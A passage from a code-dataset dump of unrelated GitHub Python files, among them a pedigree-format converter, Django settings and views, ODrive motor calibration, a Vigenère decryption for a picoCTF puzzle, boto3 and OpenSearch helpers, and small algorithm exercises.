pedigree\"\"\"\n\n def __init__(self, fid, iid, father, mother, sex, pheno):\n self.fid = fid\n self.iid = iid\n self.spouses = set()\n self.father = father\n self.mother = mother\n self.sex = sex\n self.pheno = pheno\n self.children = []\n self.founder = False\n\n def add_spouse(self, sid):\n \"\"\"Add a spouse (note the type is a set)\"\"\"\n self.spouses.add(sid)\n\n def add_child(self, cid):\n \"\"\"Add a child\"\"\"\n assert cid not in self.children\n self.children.append(cid)\n\n################################################################################\n# PARSE ARGS and INPUT FILE\n################################################################################\n\ndef parse_args():\n \"\"\"Parse command line arguments.\"\"\"\n parser = optparse.OptionParser(description='fam to def file for Ped-sim')\n\n parser.add_option('-i', '--fam_filename', type='string', \\\n help='path to input fam file')\n parser.add_option('-o', '--def_filename', type='string', \\\n help='path to output def file')\n\n (opts, args) = parser.parse_args()\n\n mandatories = ['fam_filename', 'def_filename',]\n for m in mandatories:\n if not opts.__dict__[m]:\n print('mandatory option ' + m + ' is missing\\n')\n parser.print_help()\n sys.exit()\n\n return opts\n\ndef read_indvs(filename):\n \"\"\"Parse input fam file to create Individuals\"\"\"\n # 2d dictionary:\n # key1=FAM_ID (string), val=second dictionary\n # key2=ID (string), val=Individual\n all_indvs = {}\n\n # read file\n f = open(filename,'r')\n for line in f:\n tokens = line.strip().split()\n indv = Individual(tokens[0], tokens[1], tokens[2], tokens[3], tokens[4],\n 
tokens[5])\n if tokens[0] not in all_indvs:\n all_indvs[ tokens[0] ] = {}\n all_indvs[ tokens[0] ][ tokens[1] ] = indv\n f.close()\n\n # process all the individuals to add spouses and children\n for fid in all_indvs:\n num_indvs = 0\n num_founder = 0\n for iid, indv in all_indvs[fid].items():\n num_indvs += 1\n fatherid = indv.father\n motherid = indv.mother\n\n # check parent sexes\n if fatherid != '0':\n assert all_indvs[fid][fatherid].sex == \"1\", \\\n \"Fathers must be male; see family \" + fid + \" indiv \" + fatherid\n if motherid != '0':\n assert all_indvs[fid][motherid].sex == \"2\", \\\n \"Mothers must be female; see family \" + fid + \" indiv \" + motherid\n\n\n # non-founder individual\n if fatherid != '0' and motherid != '0':\n all_indvs[fid][fatherid].add_spouse(motherid)\n all_indvs[fid][motherid].add_spouse(fatherid)\n all_indvs[fid][fatherid].add_child(iid)\n all_indvs[fid][motherid].add_child(iid)\n else:\n indv.founder = True\n num_founder += 1\n print(\"fam file, '\" + fid + \"' num individuals:\", num_indvs)\n print(\"fam file, '\" + fid + \"' num founders:\", num_founder)\n\n return all_indvs\n\n################################################################################\n# CREATE GENERATIONS\n################################################################################\n\ndef fam_generations(fam_indvs, fid):\n \"\"\"From dictionary of all individuals, iteratively create generations\"\"\"\n fam_gens = []\n used_ids = set() # keep track of which individuals we've processed\n\n # set up first generation with founders\n prev_gen = Generation()\n for iid, indv in fam_indvs.items():\n if indv.founder:\n\n # one spouse\n if len(indv.spouses) == 1:\n sid = list(indv.spouses)[0]\n if fam_indvs[sid].founder:\n if indv.sex == \"1\":\n assert iid not in used_ids and sid not in used_ids\n prev_gen.add_branch(iid)\n used_ids.add(iid)\n used_ids.add(sid)\n\n # multiple spouses\n else:\n assert iid not in used_ids\n prev_gen.add_branch(iid)\n used_ids.add(iid)\n\n # continue creating generations while we still have active branches\n while len(prev_gen.branches) > 0:\n fam_gens.append(prev_gen)\n next_gen = Generation()\n\n # find all the children of all parents in the previous generation\n for bid in prev_gen.branches:\n parent = fam_indvs[bid]\n\n for cid in parent.children:\n child = fam_indvs[cid]\n fatherid = child.father\n motherid = child.mother\n father = fam_indvs[fatherid]\n mother = fam_indvs[motherid]\n\n # neither parent is founder\n if not father.founder and not mother.founder:\n # make sure parents are NOT in *current* generation\n if fatherid in used_ids and \\\n motherid in used_ids and \\\n fatherid not in next_gen.branches and \\\n motherid not in next_gen.branches:\n\n # add a branch for this child\n if cid not in used_ids:\n next_gen.add_branch(cid)\n used_ids.add(cid)\n\n # WAIT to add until generation after one of the parents\n else:\n pass\n\n # one parent is founder\n else:\n # pass over married-in with multiple spouses\n if parent.founder and len(parent.spouses) > 1:\n pass\n else:\n if fatherid == parent.iid:\n assert mother.founder\n if motherid not in used_ids:\n used_ids.add(motherid)\n else:\n assert father.founder\n if fatherid not in used_ids:\n used_ids.add(fatherid)\n\n # add a branch for this child\n if cid not in used_ids:\n next_gen.add_branch(cid)\n used_ids.add(cid)\n\n # set up for the next generation\n prev_gen = next_gen\n\n print(\"def file, '\" + fid + \"' num individuals:\", len(used_ids))\n\n # look at number of individuals in 
branches\n in_branches = []\n for gen in fam_gens:\n in_branches.extend(gen.branches)\n in_branches = set(in_branches)\n\n # founders are counted in branches in gen 0\n num_founders = len(fam_indvs) - len(in_branches) + len(fam_gens[0].branches)\n return fam_gens\n\ndef find_gen_branch(iid, g, fam_gens):\n \"\"\"\n Based on the ID of an individual and the current generation, search through\n previous generations for the branch index.\n \"\"\"\n\n for prev_gen in range(g-1, -1, -1):\n b = fam_gens[prev_gen].find_branch(iid) # indexed from zero\n if b != None:\n return prev_gen, b # return as soon as we find it\n\n return None, None\n\ndef pretty_print(s_dict, fam_indvs):\n \"\"\"From a dictionary of children for each couple, create the \"def\" format\"\"\"\n s = \" \"\n founder_ids = []\n\n # go through each couple\n for k, v in s_dict.items():\n\n branches = []\n string = None\n # all children should have same parents here\n for item in v:\n branches.append(item[0])\n if string == None:\n string = item[1]\n else:\n assert item[1] == string\n\n fatherid = k.split('+')[0]\n motherid = k.split('+')[1]\n if fam_indvs[fatherid].founder:\n if fatherid not in founder_ids:\n founder_ids.append(fatherid)\n if fam_indvs[motherid].founder:\n if motherid not in founder_ids:\n founder_ids.append(motherid)\n\n # one or both spouses is a founder (this is just sanity checking)\n if \"_\" not in string:\n assert fam_indvs[fatherid].founder or fam_indvs[motherid].founder\n # check for married-in with multiple spouses\n elif fam_indvs[fatherid].founder or fam_indvs[motherid].founder:\n #print(fatherid, motherid, 'married-in with multiple spouses')\n pass\n\n # sort children in each branch\n branches.sort()\n\n # one child\n if len(branches) == 1:\n s += str(branches[0]) + \":\" + string + \" \"\n # children are consecutive\n elif branches[-1] - branches[0] + 1 == len(branches):\n s += str(branches[0]) + \"-\" + str(branches[-1]) + \":\" + string + \" \"\n # children are not consecutive\n else:\n s += \",\".join([str(branches[i]) for i in range(len(branches))]) + \\\n \":\" + string + \" \"\n\n return s, founder_ids\n\n################################################################################\n# MAIN\n################################################################################\n\ndef main():\n \"\"\"Orchestrate generation creation and writing of output file\"\"\"\n opts = parse_args()\n all_indvs = read_indvs(opts.fam_filename)\n\n print()\n\n # set up def file\n def_file = open(opts.def_filename,'w')\n\n # process the families one by one\n for fid in all_indvs:\n fam_gens = fam_generations(all_indvs[fid], fid)\n founder_ids = []\n\n def_file.write(\"def \" + fid + \" 1 \" + str(len(fam_gens)) + \"\\n\")\n\n # write each generation in def format\n for g in range(len(fam_gens)):\n gen = fam_gens[g]\n\n # keeps track of children with the same two parents\n s_dict = defaultdict(list)\n if g != 0:\n\n # go through all the branches to find parents in the prev\n # generation\n for b, bid in enumerate(gen.branches):\n assert not all_indvs[fid][bid].founder\n\n # IDs of father and mother\n fatherid = all_indvs[fid][bid].father\n motherid = all_indvs[fid][bid].mother\n\n # NOTE: if founder, omit spouse to create new founder spouse\n # NOTE: one parent must be from the previous generation\n # find (generation, branch_index) of indv\n fg, fb = find_gen_branch(fatherid, g, fam_gens)\n mg, mb = find_gen_branch(motherid, g, fam_gens)\n\n # CASE 1: founder father\n if fg == None:\n assert mg == g-1 # mother in 
prev generation\n                        assert all_indvs[fid][fatherid].founder\n                        add_str = str(mb+1) # just include branch index\n\n                    # CASE 2: founder mother\n                    elif mg == None:\n                        assert fg == g-1 # father in prev generation\n                        assert all_indvs[fid][motherid].founder\n                        add_str = str(fb+1) # just include branch index\n\n                    # CASE 3: both father and mother in prev generation\n                    elif fg == g-1 and mg == g-1:\n                        add_str = str(fb+1) + \"_\" + str(mb+1)\n\n                    # CASE 4: father in prev generation\n                    elif fg == g-1:\n                        add_str = str(fb+1) + \"_\" + str(mb+1) + \"^\" + str(mg+1)\n\n                    # CASE 5: mother in prev generation\n                    elif mg == g-1:\n                        add_str = str(mb+1) + \"_\" + str(fb+1) + \"^\" + str(fg+1)\n\n                    # should not get here!\n                    else:\n                        print(\"ERROR: no valid parents for indv\", bid)\n\n                    # add this indv to correct parents\n                    parent_str = fatherid+\"+\"+motherid\n                    s_dict[parent_str].append([b+1, add_str])\n\n                # convert to def format\n                s, f_ids_gen = pretty_print(s_dict, all_indvs[fid])\n\n                # keep track of founder IDs for debugging\n                founder_ids.extend(f_ids_gen)\n\n            # write to def\n            def_file.write(str(g+1) + \" 1 \" + str(len(gen.branches)) + s + \"\\n\")\n\n        founder_ids = set(founder_ids)\n        print(\"def file, '\" + fid + \"' num founder:\", len(founder_ids))\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"williamslab/ped-sim","sub_path":"fam2def.py","file_name":"fam2def.py","file_ext":"py","file_size_in_byte":14022,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"72516791235","text":"#!/usr/bin/python3\n\"\"\" Module - 2-export_to_JSON\"\"\"\n\nif __name__ == \"__main__\":\n    import json\n    import requests\n    from sys import argv\n\n    r = requests.get(\"https://jsonplaceholder.typicode.com/todos\",\n                     params={\"userId\": int(argv[1])})\n    list_dict = r.json()\n\n    r = requests.get(\"https://jsonplaceholder.typicode.com/users\",\n                     params={\"id\": int(argv[1])})\n    username = r.json()[0].get(\"username\")\n\n    for task in list_dict:\n        task[\"task\"] = task.pop(\"title\")\n        task[\"username\"] = username\n        task.pop(\"userId\")\n        task.pop(\"id\")\n\n    json_dict = {argv[1]: list_dict}\n\n    with open('{}.json'.format(argv[1]), 'w', encoding=\"UTF-8\") as jsonfile:\n        str_json = json.dumps(json_dict)\n        jsonfile.write(str_json)\n","repo_name":"DiegoOrejuela/holberton-system_engineering-devops","sub_path":"0x15-api/2-export_to_JSON.py","file_name":"2-export_to_JSON.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27494217149","text":"import logging\nimport tempfile\n\nfrom .common import *\nfrom .deps.image_build import *\nfrom .deps.restframework import *\nfrom .mods.cors import *\nfrom .mods.oidc import *\n\nlogging.disable(logging.CRITICAL)\n\nDEBUG = True\n\nORG_NAME = \"OrgTestSuite\"\nDEFAULT_DOMAIN = \"http://testserver\"\nALLOWED_HOSTS = [\"testserver\"]\n\nASSET_BUFFER_DIR = tempfile.mkdtemp()  # overridden in individual tests\nSUBTUPLE_DIR = os.path.join(MEDIA_ROOT, \"subtuple\")\nSUBTUPLE_TMP_DIR = os.path.join(SUBTUPLE_DIR, \"tmp\")\n\nORCHESTRATOR_HOST = \"orchestrator\"\nORCHESTRATOR_PORT = 9000\nORCHESTRATOR_TLS_ENABLED = False\nORCHESTRATOR_MTLS_ENABLED = False\nORCHESTRATOR_RETRY_DELAY = 0\nORCHESTRATOR_GRPC_KEEPALIVE_TIME_MS = 60000\nORCHESTRATOR_GRPC_KEEPALIVE_TIMEOUT_MS = 20000\nORCHESTRATOR_GRPC_KEEPALIVE_PERMIT_WITHOUT_CALLS = False\nORCHESTRATOR_GRPC_KEEPALIVE_MAX_PINGS_WITHOUT_DATA = 0\n\nLEDGER_MSP_ID = \"testOrgMSP\"\nLEDGER_CHANNELS = {\"mychannel\": 
{\"chaincode\": {\"name\": \"mycc\"}}}\n","repo_name":"Substra/substra-backend","sub_path":"backend/backend/settings/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"71766545155","text":"\"\"\"add camera options\n\nRevision ID: ca91c47e7274\nRevises: 0187ea22dc4b\nCreate Date: 2021-12-19 15:15:48.525102\n\n\"\"\"\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(__file__, \"../../../..\")))\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ca91c47e7274'\ndown_revision = '0187ea22dc4b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n with op.batch_alter_table(\"camera\") as batch_op:\n batch_op.add_column(sa.Column('show_preview', sa.Boolean))\n\n op.execute(\n '''\n UPDATE camera\n SET show_preview=0\n '''\n )\n\n\ndef downgrade():\n with op.batch_alter_table(\"camera\") as batch_op:\n batch_op.drop_column('show_preview')\n","repo_name":"kizniche/Mycodo","sub_path":"alembic_db/alembic/versions/ca91c47e7274_add_camera_options.py","file_name":"ca91c47e7274_add_camera_options.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"} +{"seq_id":"36432460373","text":"import pandas as pd\nimport collections\n\n\n\nclass MessageManager(object):\n\n def __init__(self, self_idx, num_agents):\n self.messages = {}\n for agent_idx in range(1,num_agents+1):\n if self_idx == agent_idx:\n continue\n self.messages[agent_idx] = []\n self.self_id = self_idx\n\n def add_messages(self, game_diff):\n print(game_diff)\n game_diff_msgs = game_diff[\"text\"]\n for idx, agent in enumerate(game_diff[\"agent\"]):\n if idx+1 == self.self_id:\n continue\n self.messages[agent].append(game_diff_msgs[idx])\n print(game_diff_msgs[idx])\n\n def update_base_info(self, base_info):\n pass\n\n def create_message(self):\n message = collections.namedtuple(\"subject\", \"target\", \"COMINGOUT\", \"ESTIMATE\", \"Agree\", \"Disagree\",\"Action\",\n \"Past Result\", \"Reqiest\", \"Because\", \"Inquire\", \"Logic Op\", \"Skip\")\n return message","repo_name":"LiorMoshe/Werewolf-Anac19","sub_path":"messages_manager.py","file_name":"messages_manager.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8764040357","text":"\"\"\"\nMotor configuration and calibration script. 
Run as follows:\n\n python scripts/config_motors.py\n\nbut copy-pasting the code into a REPL is better if you're still\nfiguring parameters out, and want to re-run this multiple times\nwithout rebooting/re-finding the device\n\nFor some parameters/numbers related to current etc, check out:\nhttps://www.harrisaerial.com/wp-content/uploads/2016/12/U10-Plus-80KV-Data.jpg\nfound via\nhttps://www.harrisaerial.com/product/t-motor-u10-plus-80kv-100kv-170kv/\n\"\"\"\nimport odrive\nfrom odrive.enums import (\n MOTOR_TYPE_HIGH_CURRENT,\n ENCODER_MODE_INCREMENTAL,\n AXIS_STATE_FULL_CALIBRATION_SEQUENCE,\n AXIS_STATE_IDLE,\n)\nfrom odrive.utils import dump_errors\nfrom fibre.protocol import ChannelBrokenException\n\ncpr = 4*500\n\n\ndef config_motor(ax: 'odrive.Axis'):\n # current limit in [A]\n ax.motor.config.current_lim = 15 # not sure!\n\n # how much the current can swing (I think)\n # change this if doing current control, and get\n # CURRENT_UNSTABLE_ERROR or something\n # ax.motor.config.current_lim_tolerance\n\n # velocity limit [counts/s]\n ax.controller.config.vel_limit = cpr*16 # not sure!\n\n # calibration current [A]\n # = continuous current when stationary\n ax.motor.config.calibration_current = 10 # not sure!\n\n # number of magnet poles in motor divided by two\n ax.motor.config.pole_pairs = 20\n\n # motor type\n ax.motor.config.motor_type = MOTOR_TYPE_HIGH_CURRENT\n\n # encoder count per revolution [CPR]\n # = 4x the pulse per revolution [PPR]\n ax.encoder.config.cpr = cpr\n ax.encoder.config.mode = ENCODER_MODE_INCREMENTAL\n ax.encoder.config.use_index = True\n\n # calibration accuracy. not sure about this one\n ax.encoder.config.calib_range = 0.05\n\n # run full calibration sequence\n import time\n ax.encoder.config.zero_count_on_find_idx = True\n ax.requested_state = AXIS_STATE_FULL_CALIBRATION_SEQUENCE\n while ax.current_state != AXIS_STATE_IDLE:\n time.sleep(0.1)\n\n # set startup sequence\n # see https://docs.odriverobotics.com/api/odrive.axis.axisstate\n # despite not using the encoder's index channel, turning\n # off encoder index search made the ODrive not recognize the\n # encoders. 
Not sure why!\n    ax.config.startup_motor_calibration = False\n    ax.config.startup_encoder_index_search = True # False\n    ax.config.startup_encoder_offset_calibration = False\n    ax.config.startup_closed_loop_control = False\n    ax.config.startup_sensorless_control = False\n\n    # save\n    ax.requested_state = AXIS_STATE_IDLE\n    ax.encoder.config.pre_calibrated = True\n    ax.motor.config.pre_calibrated = True\n\n    dump_errors(odrv0, True)\n\n\n# reboot first, to make sure we don't save other random settings on the device\nprint('finding and rebooting odrive...')\nodrv0 = odrive.find_any()\ntry:\n    odrv0.reboot()\nexcept ChannelBrokenException:\n    pass\n\nprint('finding odrive...')\nodrv0 = odrive.find_any()\n\n# brake resistance [Ohm]\nodrv0.config.brake_resistance = 10 # gold one, brown one w/purple wires is 5ohm\n\nprint('configuring motor 0...')\nconfig_motor(odrv0.axis0)\n\nprint('configuring motor 1...')\nconfig_motor(odrv0.axis1)\n\nprint('saving config in memory....')\nodrv0.save_configuration()\n\nprint('rebooting...')\ntry:\n    odrv0.reboot()\nexcept ChannelBrokenException:\n    print('Lost connection because of reboot')\n","repo_name":"alknemeyer/foot-design-project","sub_path":"scripts/config_motors.py","file_name":"config_motors.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73020543874","text":"# Open two txt files and read their contents into two lists\nwith open(\"file1.txt\") as file1:\n    lines1 = file1.readlines()\nwith open(\"file2.txt\") as file2:\n    lines2 = file2.readlines()\n\n# Save the lines the two lists have in common into a new txt file\nwith open(\"result.txt\", \"w\") as result_file:\n    for line in lines1:\n        if line in lines2:\n            result_file.write(line)\n","repo_name":"ArrestX/Arrest_py_tools","sub_path":"Others_py_script/compareTxt.py","file_name":"compareTxt.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32341675282","text":"from django.views.decorators.vary import vary_on_cookie\nfrom models import Comic\nfrom nr_utils import render_with_request\nfrom django.http import HttpResponseRedirect, HttpResponsePermanentRedirect\nimport datetime\nfrom django.shortcuts import get_object_or_404\nimport random\n\ndef index(request):\n    \"\"\"the front page\"\"\"\n    comic = Comic.comics.public().order_by('-date')[0]\n    \n    return render_with_request(\n        \"nr_comics/front.html\",\n        {\"comic\": comic},\n        request\n    )\n\ndef comic(request, slug):\n    \"\"\"the page of an individual comic\"\"\"\n    comic = get_object_or_404(Comic, sequence=slug)\n    return render_with_request(\n        \"nr_comics/comic_detail.html\",\n        {\"comic\": comic},\n        request\n    )\n\ndef archive(request):\n    return render_with_request(\n        \"nr_comics/comic_list.html\",\n        {\"comics\": Comic.comics.by_year()},\n        request\n    )\n\ndef comic_image(request, slug):\n    \"\"\"the image for a particular comic\"\"\"\n    c = get_object_or_404(Comic, sequence=int(slug))\n    return HttpResponsePermanentRedirect(c.comic.url)\n\ndef random_comic(request):\n    \"\"\"redirects to a random comic\"\"\"\n    return HttpResponseRedirect(\n        get_object_or_404(\n            Comic,\n            sequence=random.randint(1,Comic.last())\n        ).get_absolute_url()\n    )","repo_name":"0sn/nr_comics","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"13940654898","text":"def veginere(plaintext: str, key: str) -> str:\n    ciphertext = 
str()\n    # plain text process\n    plaintext = plaintext.upper()\n    plaintext = plaintext.replace(\" \", \"\")\n    # key process\n    key = key.replace(\" \",\"\")\n    # encryption\n    for i in range(len(plaintext)):\n        if (plaintext[i].isalpha()):\n            ciphertext += chr((ord(plaintext[i])+ord(key[i%len(key)]))%26 + 65)\n        else:\n            continue\n    return ciphertext\n\ndef de_veginere(ciphertext: str, key: str) -> str:\n    plaintext = str()\n    #cipher text process\n    ciphertext = ciphertext.upper()\n    ciphertext = ciphertext.replace(\" \", \"\")\n    # key process\n    key = key.replace(\" \", \"\")\n    # decryption\n    key_index = 0\n    for i in range(len(ciphertext)):\n        if (ciphertext[i].isalpha()):\n            shift = ord(key[key_index]) - ord('A') # shift = ord(key) - ord('A')\n            plaintext += chr((ord(ciphertext[i])-shift-65)%26+65)\n        else:\n            plaintext += ciphertext[i]\n        key_index = (key_index+1)%len(key)\n    return plaintext \n\nif __name__==\"__main__\":\n    ciphertext, key = 'UFJKXQZQUNB', 'SOLVECRYPTO'\n    flag = de_veginere(ciphertext, key)\n    print(f'picoCTF{{{flag}}}')","repo_name":"XD3an/CTF-all-in-one","sub_path":"CTF-write-ups/picoCTF/picoCTF2019/Cryptography/Easy1/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27129961558","text":"#!/usr/bin/python3\n\nimport boto3\n\n\naws_con=boto3.session.Session(profile_name='cloud_user',region_name='us-east-1')\nec2_cli=aws_con.client('ec2')\nec2_res=aws_con.resource('ec2')\n\n#for instance in ec2_con.describe_instances(Filters=[{'Name': 'architecture','Values': ['x86_64']}]):\nfor instance in ec2_res.instances.all():\n#    print(instance)\n    print(\n        \"Id: {0}\\nPlatform: {1}\\nType: {2}\\nPublic IPv4: {3}\\nAMI: {4}\\nState: {5}\\n\".format(\n            instance.id, instance.platform, instance.instance_type, instance.public_ip_address, instance.image.id, instance.state\n        )\n    )\n\nprint('==========EC2 using Client Object===========')\nresponse=ec2_cli.describe_instances()\n#print(response)\nfor instance in response['Reservations']:\n    for each_instance in instance['Instances']:\n        print(each_instance['InstanceId'])\n        print('=======================')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mkhaire/Python","sub_path":"boto3/listec2.py","file_name":"listec2.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73395648195","text":"import logging\n\nfrom attrs import define, field\nfrom nbtlib import Compound, String, Byte\n\nfrom pymatic.common.container import Container\nfrom pymatic.common.item import Item\nfrom pymatic.common.nbt_object import NBTObject\n\n\n@define(kw_only=True)\nclass ItemStack(NBTObject, Container):\n    item: Item\n    count: int = field(converter=int)\n    slot: int = field(converter=int, default=-1)\n\n    _origin: Container = field(default=None)\n\n    @property\n    def name(self) -> str:\n        return self.item.name\n\n    @property\n    def origin(self):\n        return self._origin\n\n    @classmethod\n    def from_nbt(cls, nbt: Compound | dict) -> 'ItemStack':\n        return ItemStack(\n            nbt=nbt,\n            item=Item[nbt['id']],\n            count=nbt['Count'],\n            slot=nbt.get('Slot', -1)  # fall back to the field default; the int converter would raise on None\n        )\n\n    def to_nbt(self) -> Compound:\n        # self.validate()\n\n        self.nbt.update(Compound({\n            'id': String(self.name),\n            'Count': Byte(self.count),\n            'Slot': Byte(self.slot)\n        }))\n        if self.slot == -1:\n            del self.nbt['Slot']\n        return self.nbt\n\n    def validate(self) -> bool:\n        res: bool = self._type_validation()\n\n        if self.count > 
self.item.stack_size:\n            logging.warning(f'Unexpected stack size for {self}. Expected {self.item.stack_size}')\n            res = False\n\n        return res\n","repo_name":"kikugie/pymatic","sub_path":"pymatic/common/item_stack.py","file_name":"item_stack.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5700609176","text":"# SW Expert Academy - Problem 6190: Jeonggon's monotonically increasing number\n\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n    N = int(input())\n    numbers = list(map(int, input().split()))\n    result = 0\n    for i in range(N - 1):\n        for j in range(i + 1, N):\n            num = numbers[i] * numbers[j]\n            temp = str(num)\n            check = True\n            for k in range(len(temp) - 1):\n                if int(temp[k + 1]) < int(temp[k]):\n                    check = False\n                    break\n            if check:\n                result = max(result, num)\n    if result == 0:\n        result = -1\n    print('#{} {}'.format(tc, result))\n\n","repo_name":"wnstj-yang/Algorithm","sub_path":"SWEA/D3/SWEA_6190.py","file_name":"SWEA_6190.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71335751234","text":"import sys\nnum = int(sys.stdin.readline())\n\ndef cal(num):\n    lst = []\n    if num%3 == 0:\n        a = num//3\n        lst.append(a)\n    if num%2 == 0:\n        b = num//2\n        lst.append(b)\n    c = num-1\n    lst.append(c)\n    return lst\n\ndp = {}\n\nlst = [num]\n\nlevel = 0\nwhile min(lst) > 1:\n    \n    lst2 = []\n    for i in lst:\n        new = cal(i)\n        dp[i] = new\n        lst2 += new\n    level += 1\n    lst = set(lst2)\n    if 1 in lst:\n        \n        break\n\n\nprint(level) \n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kokoko12334/TIL2","sub_path":"baekjoon/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"46016206770","text":"import dialog\n\n\nclass User:\n    def __init__(self, name, age, sex):\n        self.name = name\n        self.age = age\n        self.sex = sex\n\n    prefix = property(doc=\"marriage status prefix\")\n\n    @prefix.getter\n    def prefix(self):\n        if hasattr(self, \"_prefix\"):\n            return self._prefix\n        if self.sex == \"male\":\n            return \"Mr\"\n        elif self.age < 22:\n            return \"Ms\"\n        else:\n            return \"Mrs\"\n\n    @prefix.setter\n    def prefix(self, value):\n        if value not in (\"Mr\", \"Ms\", \"Mrs\"):\n            raise ValueError(\"enter Mr, Ms or Mrs\")\n        else:\n            self._prefix = value\n\n    @classmethod\n    def by_dialog(cls):\n        return cls(\n            name=dialog.ask_name(),\n            age=dialog.ask_age(),\n            sex=dialog.ask_sex()\n        )\n\n    def __repr__(self):\n        return \"{prefix} {name} ({age})\".format(\n            prefix=self.prefix,\n            **self.__dict__\n        )\n","repo_name":"Odomontois/di_example","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5201945178","text":"from docx import Document\nimport gc\n\nimport wx\n\n\nclass WriteWord:\n    # base_document = Document()\n    # base_document_path = str()\n    new_document = Document()\n    # new_document_path = str()\n\n    def __init__(self, path, excel_document, progress, text):\n        # Progress Bar\n        self.progress = progress\n        self.text = text\n\n        # Open base word document\n        self.base_document_path = path\n        self.base_document = Document(path)\n\n        # Create new document\n        self.new_document_path = excel_document.get_excel_path().replace('.xlsx', '') + '_new.docx'\n        self.new_document.save(self.new_document_path)\n\n        self.path = path\n        self.population = 
str(excel_document.get_population())\n\n        # Make page, find and replace\n        self.copying_page(excel_document.get_population())\n        self.find_and_replace(excel_document.get_howmuch(), excel_document.get_numberof())\n\n    def find_and_replace(self, excel_howmuch, excel_numberof):\n        howmuch = excel_howmuch\n        numberof = excel_numberof\n\n        howmuch_counter = 0\n        numberof_counter = 0\n        for p in self.new_document.paragraphs:\n            if \"HOWMUCH\" in p.text:\n                inline = p.runs\n\n                for i in range(len(inline)):\n                    if \"HOWMUCH\" in inline[i].text:\n                        text = inline[i].text.replace(\"HOWMUCH\", str(howmuch[howmuch_counter]))\n                        inline[i].text = text\n                        howmuch_counter += 1\n\n            if \"NUMBEROF\" in p.text:\n                inline = p.runs\n\n                for i in range(len(inline)):\n                    if \"NUMBEROF\" in inline[i].text:\n                        text = inline[i].text.replace(\"NUMBEROF\", str(numberof[numberof_counter]).zfill(len(self.population)))\n                        inline[i].text = text\n                        numberof_counter += 1\n\n            self.text.SetLabel(\"Replacing \" + str(numberof_counter))\n            self.progress.SetValue(numberof_counter)\n            wx.Yield()\n\n        self.new_document.save(self.new_document_path)\n\n        self.text.SetLabel(\"Done (probably)\")\n        self.progress.SetValue(0)\n\n    def copying_page(self, population):\n\n        self.progress.SetRange(population)\n\n        test = 0\n        for counter in range(population):\n            for p in self.base_document.element.body:\n                self.new_document.element.body.append(p)\n            self.base_document = Document(self.base_document_path)\n            self.progress.SetValue(test)\n            self.text.SetLabel(\"Copying page \" + str(test))\n            wx.Yield()\n            test += 1\n\n        self.new_document.save(self.new_document_path)\n        self.progress.SetValue(0)\n","repo_name":"minarc/WADIZ","sub_path":"WriteWord.py","file_name":"WriteWord.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"656482704","text":"import json\nimport os\nfrom opensearchpy import OpenSearch, RequestsHttpConnection\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom datetime import datetime\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\ndef os_connection_setup():\n    host = \"search-lex-bot-elasticsearch-jz6wdka5rp55mtntkkxqu26vva.us-east-1.es.amazonaws.com\"\n    port = 443\n    #commented out the authentication as git guardian was throwing an issue.\n    #auth = (\"sakthi\", \"\")\n    # read the credentials from environment variables (variable names assumed) so no secret is hardcoded\n    auth = (os.environ.get(\"OPENSEARCH_USER\", \"\"), os.environ.get(\"OPENSEARCH_PASS\", \"\"))\n    \n    client = OpenSearch(\n        hosts = [{\"host\": host, \"port\": port}],\n        http_auth = auth,\n        use_ssl = True,\n        verify_certs = True,\n        ssl_assert_hostname = False,\n        ssl_show_warn = False,\n        connection_class = RequestsHttpConnection\n    )\n    \n    return client\n\ndef os_search_query(cuisine, client):\n    resp = client.search(\n        index=\"restaurants\",\n        body={\n            \"query\": {\n                \"bool\": {\n                    \"must\": {\n                        \"match_phrase\": {\n                            \"cuisine\": cuisine,\n                        }\n                    },\n                },\n            }, \n        }\n    )\n    #print(resp)\n    return resp\n\ndef db_query(os_resp):\n    items = [] \n    